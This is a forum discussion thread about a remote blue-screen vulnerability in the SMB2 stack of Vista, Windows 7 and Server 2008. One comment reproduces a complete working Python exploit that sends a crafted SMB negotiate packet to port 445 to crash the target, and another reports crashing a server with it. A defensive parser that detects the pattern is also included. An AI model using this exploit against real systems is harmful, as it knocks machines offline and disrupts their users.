Windows 7 Reintroduces Remote BSoD
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy of the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
Correction! (Score:5, Informative)
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
For all who want a more technical summary of TFA: (Score:5, Informative)
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure.
Now please excuse me, I have to go and play a bit with our network admin.
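Added example, not code from the post above: a defender-side parser that pulls the Process ID High field and the dialect list out of a captured SMB1 Negotiate Protocol request (NetBIOS session framing included) and flags the combination the post describes. The sample packets are constructed here; whether legitimate clients ever send a non-zero Process ID High in a negotiate is an assumption, so treat a hit as something to review rather than proof.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# NetBIOS (4) + Protocol(4) + Command(1) + Status(4) + Flags(1) + Flags2(2) = 16
PID_HIGH_OFFSET = 4 + 12


def parse_negotiate(payload):
    """Split one SMB1 Negotiate Protocol request into header fields and dialects."""
    if len(payload) < 4 + 32 + 3:
        raise ValueError("too short for NetBIOS + SMB header")
    nb_len = int.from_bytes(payload[1:4], "big")       # 24-bit session length
    smb = payload[4:4 + nb_len]
    if smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    # Fixed 32-byte SMB header: Command, Status, Flags, Flags2, PIDHigh,
    # SecurityFeatures, Reserved, TID, PIDLow, UID, MID (all little-endian).
    (cmd, status, flags, flags2, pid_high, _sig, _res,
     tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", smb[4:32])
    if cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not a Negotiate Protocol request")
    word_count = smb[32]
    byte_count = struct.unpack("<H", smb[33:35])[0]
    data = smb[35:35 + byte_count]
    # Each dialect is "\x02" followed by a NUL-terminated ASCII string.
    dialects = [d.rstrip(b"\x00").decode("ascii") for d in data.split(b"\x02") if d]
    return {"status": status, "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid,
            "word_count": word_count, "dialects": dialects}


def is_suspicious(payload):
    """True when the request offers an SMB2 dialect and carries a non-zero
    Process ID High, the field the post identifies as the crash trigger."""
    fields = parse_negotiate(payload)
    return fields["pid_high"] != 0 and any(d.startswith("SMB 2") for d in fields["dialects"])


# Constructed benign request: PID High = 0, two dialects, NetBIOS framing.
DIALECTS = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00"
SMB_HDR = (SMB_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00\x00\x00\x00" + b"\x18"
           + b"\x53\xc8" + b"\x00\x00" + b"\x00" * 8 + b"\x00\x00" + b"\xff\xff"
           + b"\xff\xfe" + b"\x00\x00" + b"\x00\x00")
BODY = b"\x00" + struct.pack("<H", len(DIALECTS)) + DIALECTS
GOOD = b"\x00" + (len(SMB_HDR) + len(BODY)).to_bytes(3, "big") + SMB_HDR + BODY
# Same request with the Process ID High bytes set to the value in the post.
BAD = GOOD[:PID_HIGH_OFFSET] + b"\x00\x26" + GOOD[PID_HIGH_OFFSET + 2:]
```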
Re:IP Reasons for SMB2 (Score:3, Informative)
No, it won't. The specs are right here [microsoft.com].
Re:IP Reasons for SMB2 (Score:3, Informative)
Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promise nor the Community Promise (both linked) cover SMB2.
Re:IP Reasons for SMB2 (Score:5, Informative)
No, it won't. The specs are right here [microsoft.com].
"No, it won't" what? Possibly spell problems for the Samba team? From your link:
Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...
Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?
Why do they use the ambiguous language quoted above if this is an open technology I'm not supposed to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock-in?) but I'm not about to give them the benefit of the doubt.
Re:Please grow up, you're driving us away (Score:2, Informative)
Yes, use Windows because none of that ever happens. [electronista.com]
Great strawman argument, btw. We should ignore vulnerabilities in Microsoft software because some precious flowers don't want their sensibilities offended.
Re:Please grow up, you're driving us away (Score:1, Informative)
Dear User. It's a shame you cannot join the Linux community. We will be missing you and your valuable posts including:
1) Your thoughts on what should be fixed in 'linux'
2) Numerous (yet not very useful) descriptions of problems you encountered with 'linux' and demands to fix them
3) Comparing 'linux' to windows every time a new ubuntu or windows release is out
4) Screenshots of your desktop & stories about your friends seeing you use 'linux'
Re:Local? (Score:3, Informative)
"but generally speaking you're not expecting attacks from inside your LAN"
Right, because a virus on my local network would never take advantage of that.
Right, because more than 60% of data loss events are triggered by insiders.
Right, because you personally know and trust every user on your LAN.
Right, because nobody would connect an unapproved device, like their iPod, or personal PC, to the LAN.
If you're not expecting most of your attacks from inside your LAN then you're just fooling yourself.
Re:Local? (Score:1, Informative)
You know, some of us work at multi-national corporations/firms that have offices in other countries. Should someone have access to the network by some means, they could crash a company's machines from halfway around the world since they are all on the same LAN...
What did it cost you to run cables 50,000 miles between your offices, and how did you get over the latency? Further to that, isn't your IT/Info-Sec group afraid of someone putting a listener on those cables?
Any place I know of with remote/satellite offices (including my own) uses WAN or VPN, where (due to separate subnets and proper routing) one member-LAN can't take down the other member-LAN halfway across the world with a simple ping-flood, netbios, or SMB attack.
Most modern offices these days even go so far as having each floor, or even department, on different physical networks, separate from each other.
Re:I knew Windows 7 was too good to be true (Score:3, Informative)
I'll bite.
Theologically speaking, it's not to avoid "Allah feeling threatened and insecure".
The rug maker is just ensuring that he won't fall to pride and hubris.
Windows 2008 is very vulnerable. (Score:2, Informative)
My coworker and I tried this on an updated Windows 2008 today and neither of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am I the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even run a fuzzer against their code at all? If blatantly obvious holes like this go unseen in the new TCP/IP SMB2 code, rest assured a whole slew of new holes will be found later.
Funniest thing is that this doesn't affect XP while Microsoft touts Windows 7/2008 as the safest OS ever. I guess it's all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decision onto the user with UAC.
Re:Local? (Score:3, Informative)
If it works with IPv6 then a malicious site can have an IPv6 address. When the user visits the site the code reads the source IP and implements the attack.
This is why in a properly configured network you can limit SMB to within your network, by use of a firewall. With IPv6 a firewall is pretty much mandatory. If you need to file share outside your network, then using something like WebDAV in HTTPS mode is probably better, since this helps make it clear that you are not within your network.
Actually thinking about it, it would be cool if there was a way to change the icon of the server to indicate that it is outside your network (based on the subnet mask or something of the sorts).
Re:Local? (Score:3, Informative)
I can see it being used multiple times to dereference multiple kernel pointers, but I can't see how you would get it to execute code. I suppose it's a question of how much damage you can do dereferencing stuff inside the kernel vs how much protection NT has against this stuff.
On Linux a few well placed dereferences and you could probably disable the firewall then run anything as effective root (by removing all security checks); of course, to do damage you would still need a second exploit on an already running process (including those that were protected) to make use of this.
Re:Please grow up, you're driving us away (Score:3, Informative)
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
I do agree with a lot of things that you said, except for the main point. If you are truly the mature adult here you should be able to use the best tool for the job even if others who use it act like complete idiots. Most of the people you speak of aren't the ones doing hard-core Linux development. There are some very brilliant, mature, and overall decent individuals in the Open Source Community. Heck, if you really want to help, bring your Software Engineering skills and your open-mindedness to the community. You'll help it grow in two ways!